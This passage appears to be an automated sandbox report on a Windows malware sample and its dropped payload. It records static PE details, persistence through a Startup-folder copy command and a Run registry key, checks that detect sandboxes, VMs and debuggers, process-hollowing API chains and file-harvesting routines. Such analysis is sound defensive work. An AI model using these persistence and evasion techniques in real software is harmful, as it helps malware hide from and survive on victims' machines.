                        Source: 0XzeMRyE1e.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: 0XzeMRyE1e.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 0XzeMRyE1e.exe, 0XzeMRyE1e.exe, 0000000D.00000000.298445162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 0000000D.00000000.297328127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.446415275.0000000003832000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.446348077.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000000.428197655.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000002.430278226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000000.418537482.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: C:\Tex\Ras sav\Quevah\Bopo nan.pdb source: file_22613.exe, file_22613.exe, 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000011.00000000.330984448.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000012.00000002.508562908.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000012.00000000.360616448.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000014.00000000.380119657.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000014.00000002.508484154.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613[1].exe.13.dr, file_22613.exe.13.dr
                        Source: Binary string: C:\Users\Administrator\Desktop\PRIVATESTUB - powershell\ClassLibrary1\obj\Release\ClassLibrary1.pdb source: 0XzeMRyE1e.exe, 00000000.00000002.308828876.00000000094E0000.00000004.08000000.00040000.00000000.sdmp, 0XzeMRyE1e.exe, 00000000.00000002.301026710.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.450200051.0000000008C00000.00000004.08000000.00040000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Administrator\Desktop\attachments\obj\Debug\Zonli.pdb source: 0XzeMRyE1e.exe, 0XzeMRyE1e.exe.7.dr
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Code function: 0_2_08DCA5B7 pushfd ; retf 0_2_08DCA5DF
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Code function: 0_2_04CE062B push eax; mov dword ptr [esp], ecx 0_2_04CE063C
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Code function: 0_2_04CE0638 push eax; mov dword ptr [esp], ecx 0_2_04CE063C
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Code function: 13_2_00413856 push ecx; ret 13_2_00413869
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Code function: 13_2_0042FE75 push esi; ret 13_2_0042FE7E
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Code function: 16_2_00C640C3 push eax; ret 16_2_00C640CA
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Code function: 16_2_00C68701 push 24418B02h; ret 16_2_00C68713
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Code function: 16_2_00C651CB push 690804C3h; ret 16_2_00C651D2
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Code function: 16_2_00C69C1B push 14418B02h; ret 16_2_00C69C23
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Code function: 16_2_069880A2 push es; ret 16_2_069880B0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Code function: 16_2_0698FD70 push es; ret 16_2_0698FD80
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Code function: 16_2_0698EA7A push 00000003h; ret 16_2_0698EA7C
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_00C648EB push ebp; retf 17_2_00C648EE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_00C6485B push esi; iretd 17_2_00C6485D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_00C67EFD push ds; retf 17_2_00C67F09
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_00C68664 pushfd ; iretd 17_2_00C6867A
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_00C74E0D push ecx; ret 17_2_00C74E20
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_00C68757 push ecx; ret 17_2_00C68758
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_00424445 push ecx; ret 17_2_00424458
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_00421A4D push ecx; ret 17_2_00421A60
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_00C7DA0D LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,17_2_00C7DA0D
                        Source: initial sample | Static PE information: section name: .text entropy: 7.66967630829

                        Persistence and Installation Behavior

                        Source: Yara match | File source: dump.pcap, type: PCAP
                        Source: Yara match | File source: 0000000D.00000002.509327209.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000D.00000002.509308584.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | File created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe

                        Boot Survival

                        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe\:Zone.Identifier:$DATA
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run file_22613.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00419473 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00419473
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_17-36350
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeStalling execution: Execution stalls by calling Sleepgraph_13-18765
                        Source: file_22613.exeBinary or memory string: DIR_WATCH.DLL
                        Source: file_22613.exeBinary or memory string: SBIEDLL.DLL
                        Source: file_22613.exeBinary or memory string: API_LOG.DLL
                        Source: file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CCONOUT$AVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLLCL8K19Z
                        Source: file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpBinary or memory string: CONOUT$AVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLLCL8K19Z
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_17-36549
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 2424Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 5152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 2064Thread sleep time: -900000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6296Thread sleep count: 288 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6296Thread sleep time: -51840000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6304Thread sleep time: -50000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6300Thread sleep count: 268 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6300Thread sleep time: -48240000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6336Thread sleep count: 48 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe TID: 6612Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe TID: 6540Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_17-35780
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041628C GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004163B0h17_2_0041628C
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI coverage: 9.7 %
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C688BA rdtsc 17_2_00C688BA
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 50000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_004099F2 _memset,_memset,_memset,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,17_2_004099F2
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI call chain: ExitProcess graph end nodegraph_17-36313
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI call chain: ExitProcess graph end nodegraph_17-35769
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI call chain: ExitProcess graph end nodegraph_17-35949
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI call chain: ExitProcess graph end nodegraph_17-36229
                        Source: file_22613.exe, 00000011.00000002.512344762.0000000001503000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.307033295.0000000006F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.306882846.0000000006F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00405230 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,13_2_00405230
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_0041E2F2 FindFirstFileExW,13_2_0041E2F2
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00408117 __EH_prolog3_GS,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcatW,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,17_2_00408117
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00411133 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_00411133
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040950A wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,PathMatchSpecA,FindNextFileA,FindClose,17_2_0040950A
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041778D __EH_prolog3_GS,FindFirstFileW,FindNextFileW,17_2_0041778D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040895E __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,17_2_0040895E
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00412AE1 __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,FindNextFileA,FindClose,17_2_00412AE1
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00408B6B __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,FindNextFileA,FindClose,17_2_00408B6B
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00412D6E __EH_prolog3_GS,wsprintfA,FindFirstFileA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,FindNextFileA,FindClose,17_2_00412D6E
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00411E67 __EH_prolog3_GS,__wgetenv,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,17_2_00411E67
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00410EAE wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_00410EAE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C7DA0D LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,17_2_00C7DA0D
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00419182 mov eax, dword ptr fs:[00000030h]13_2_00419182
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_004153F1 mov eax, dword ptr fs:[00000030h]13_2_004153F1
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00401000 mov eax, dword ptr fs:[00000030h]17_2_00401000
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00417CF6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00417CF6
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00402C50 DeleteObject,GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,13_2_00402C50
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00413798 SetUnhandledExceptionFilter,13_2_00413798
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_004139E3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_004139E3
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00413633 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00413633
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C7F51F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,17_2_00C7F51F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C71705 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00C71705
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C71F05 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00C71F05
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0042B2E9 SetUnhandledExceptionFilter,17_2_0042B2E9
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00424D60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00424D60
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041DEB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0041DEB4

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeMemory written: C:\Users\user\Desktop\0XzeMRyE1e.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00403170 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,13_2_00403170
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\0XzeMRyE1e.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\Desktop\0XzeMRyE1e.exe C:\Users\user\Desktop\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_004034E0 ShellExecuteExW,WaitForSingleObject,13_2_004034E0
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,17_2_00C7F0DD
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,17_2_00C780DB
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,17_2_00C7D87F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,17_2_00C77815
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,17_2_00C7F9CB
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,17_2_00C7F1E4
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,17_2_00C7F9FF
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,17_2_00C7918A
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,17_2_00C792A1
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,17_2_00C783A1
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,17_2_00C793AD
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,17_2_00C7FB3E
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,17_2_00C79339
